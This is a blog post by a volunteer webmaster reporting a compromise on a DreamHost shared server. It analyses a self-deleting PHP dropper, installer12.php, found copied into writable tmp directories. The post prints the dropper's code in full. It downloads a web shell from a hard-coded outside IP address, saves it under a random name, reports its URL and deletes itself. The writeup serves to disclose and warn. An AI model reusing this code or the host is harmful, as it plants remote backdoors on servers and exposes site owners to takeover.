Hacking at DreamHost Using Self-destructing Script

For our clients, we don't use those inexpensive shared hosting services, but the site for my daughter's school that I maintain pro bono is hosted on a shared server at DreamHost, which has been experiencing a series of hacking incidents. They host non-profit websites for free, so I'm not complaining, and am thankful for them. I just want to share the things I discovered on our site so that others may be able to benefit from it.

A few days ago, I noticed a file named installer12.php in one of our tmp directories. This file is designed to self-destruct by the last line in code which is:

@unlink(__FILE__);

At the top of installer12.php is an array with hundreds of random words, and it randomly combines two words to create a file name. What this file with a random name does is explained by Leo Parker Dirac on his blog. In his case, installer12.php happens to pick "ainslie" and "turning" to create "ainslieturing.php". Both of these words are in installer12.php.

The reason why installer12.php did not self-destruct on our site is because our tmp directory is not publicly accessible. We have htaccess file that sets the web root lower down in the directory structure. So, the hacker somehow managed to copy this installer12.php into our tmp directory, but could not trigger it because it's not publicly accessible. So, it remains undeleted.

The installer12.php in our tmp directory has a Linux user of rp_admin and group of pg7029. Neither are ours, which means that the hacker did not copy installer12.php from any script on our site. If he ran a compromised/malicious script on our website to copy this file, it would have our Linux user and group (just like the JPEG files that we allow users to upload to the site). My guess, therefore, is that the hacker had shell access to the shared server (where our site is hosted) and were able to copy installer12.php to any directory on the server with permission set to 777. In fact, our tmp directory had many subdirectories, and installer12.php was copied into all of them (about 100). So, some sort of script searched the server for any directory with 777 and automatically copied the script in all of them.

After I reported this incident to DreamHost, they ran an automated script to scan our website for any suspicious files. It is supposed to delete any known malicious files but it didn't delete installer12.php, which leads me to believe that they are not aware of it.

Here's the code part of installer12.php (right above this part is a big array with random words):

function get_page($url){
$ch1 = curl_init ();
curl_setopt ($ch1, CURLOPT_URL,$url);
curl_setopt ($ch1, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch1, CURLOPT_TIMEOUT, 1000);
curl_setopt ($ch1, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch1, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 5.2; ru; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 (.NET CLR 3.5.30729)");
$results = curl_exec ($ch1);
curl_close($ch1);
return $results;
}

$buf = get_page("http://176.65.163.29/newshell.txt");
shuffle($words);
reset($words);
$name = $words[0].$words[1].".php";
$f = @fopen($name,"w");
if ((strstr($buf,"8b7b")) && ($f)){
@fwrite($f,$buf);
@fclose($f);
$host = $_SERVER["HTTP_HOST"];
$uri = $_SERVER["REQUEST_URI"];
$path = str_replace("//","/",pathinfo($uri,PATHINFO_DIRNAME)."/".$name);
echo "|||OK|||http://$host".$path."|||";
} else {
echo "|||BAD|||cant open file $name or cant get sh|||";
}
@unlink(__FILE__);

I informed DreamHost about this. If they get back to me with any new info, I'll update this post.